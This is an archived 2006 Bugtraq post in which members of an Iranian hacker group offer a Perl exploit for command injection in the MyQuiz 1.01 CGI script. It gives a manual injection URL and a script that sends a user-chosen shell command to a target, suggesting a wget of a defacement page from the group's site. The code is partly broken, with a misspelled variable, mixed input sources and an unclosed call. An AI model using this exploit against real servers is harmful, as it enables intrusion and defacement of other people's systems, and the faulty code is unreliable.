[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060207150205.8432.qmail@securityfocus.com>
Date: 7 Feb 2006 15:02:05 -0000
From: irc0d3r@...oo.com
To: bugtraq@...urityfocus.com
Subject: MyQuiz Arbitrary Command Execution Exploit (perl)
This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit.
Athour : Hessam-x - www.hessamx.net
+IHST : iran hackerz security team (hackerz.ir)
#((Perl exploit))
#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net
use LWP::Simple;
print "Target(www.example.com)\$ ";
chomp($targ = <STDIN>);
print "path: (/cgi-bin/)\$ \n";
chomp($path=<STDIN>);
print "command: (wget www.hackerz.ir/deface.htm)\$ \n";
chomp($comd=<STDIN>);
$page=get("http://".$targ.$patch) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."\;".$comd."\|"
print "[+] Exploiting request done!\n";
print "Enjoy !";
Powered by blists - more mailing lists